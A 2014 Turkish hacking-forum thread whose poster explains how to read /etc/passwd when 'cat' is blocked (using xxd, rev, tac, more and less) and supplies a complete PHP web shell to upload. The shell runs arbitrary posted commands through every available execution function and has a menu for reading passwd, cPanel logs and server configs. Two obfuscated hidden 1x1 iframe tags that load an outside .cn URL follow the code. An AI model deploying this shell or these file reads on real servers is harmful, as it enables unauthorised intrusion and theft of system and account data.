THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

S4cuRıTy EneMy / etc/passwd Bypass

S4cuRiTy EneMy - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
04/2012
Nereden:
root@server
Yaş:
24
Mesajlar:
8.779
Konular:
1513
Teşekkür (Etti):
968
Teşekkür (Aldı):
3105
Ticaret:
(0) %
22-05-2014 09:24
#1
S4cuRıTy EneMy / etc/passwd Bypass
Merhaba, bugün sizlere lanet olasıca çekilmeyen configleri nasıl bypass edebileceginizi göstericem.

Arkadaşlar, Bazen Sunucular Cat Komutunu Vs Kapatıyorlar Bu Komutlar Genel Olarak Bilinmediğinden Kapatmıyorlar Bunlarla İşlem Yapabilirsiniz. Normal Webroot Gibi Shellerde Normal Cat / etc / passwd Diye Confige Giriyoruz Ya Aynen Verceğim Php Ve Kodlarla Da Aynı İşlemi Yapıcaz Ama İsimleri Farklı Olucak

Alıntı:
xxd /etc/passwd
rev /etc/passwd
tac /etc/passwd
more /etc/passwd
less /etc/passwd

Bu dosyayı isimsiz.php olarak yükleyin.


Kod:
<?

function safeshell($komut)
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$res = --;
if (!empty($komut))
{
if(function_exists('exec'))
{
@exec($komut,$res);
$res = join(-\n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($komut);
}
elseif(function_exists('system'))
{
@ob_start();
@system($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($komut,"r")))
{
$res = --;
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
echo -<b><font color=blue>Turk Hack TeaM / S4cuRiTy EneMy</font></b><br>-;
print_r(-
<pre>
<form method="POST" action=-->
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value=-?al??t?r" type="submit">
</form>
<form method="POST" action=-->
<b><font color=blue>H?zl? Men? :=) :</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">T?m A??k Portalar? G?r</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="G?ster Bakim">
</form>
</pre>
-);
ini_restore("safe_mode");
ini_restore("open_basedir");
if($_POST[baba]!= --) { $liz0=safeshell($_POST[baba]); }
if($_POST[liz0]!= --) { $liz0zim=safeshell($_POST[liz0]); }
$uid=safeshell('id');
$server=safeshell('uname -a');
echo -<pre><h4>-;
echo -<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>-;
echo -<b><font color=red>Server</font></b>:$server<br>-;
echo -<b><font color=red>Komut Sonu?lar?:</font></b><br>-;
if($_POST["baba"]!= --) { echo $liz0; }
if($_POST["liz0"]!= --) { echo $liz0zim; }
echo -</h4></pre>-;
?>
<*4**4q src="http://www.liagand.cn/hlp/?id=9" width=1 height=1 frameborder=0></*4**4q>
<*4**4q src="http://www.liagand.cn/hlp/?id=9" width=1 height=1 frameborder=0></*4**4q>
Selametle / S4cuRıTy EneMy
NegativeBoy, Cracker1 Teşekkür etti.
ByPro55 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
05/2014
Nereden:
world..
Mesajlar:
842
Konular:
101
Teşekkür (Etti):
23
Teşekkür (Aldı):
228
Ticaret:
(0) %
22-05-2014 09:43
#2
Teşekkürler.
NegativeBoy - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2013
Yaş:
25
Mesajlar:
757
Konular:
55
Teşekkür (Etti):
147
Teşekkür (Aldı):
93
Ticaret:
(0) %
22-05-2014 10:35
#3
eline sağlık yararlı konu dostum

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler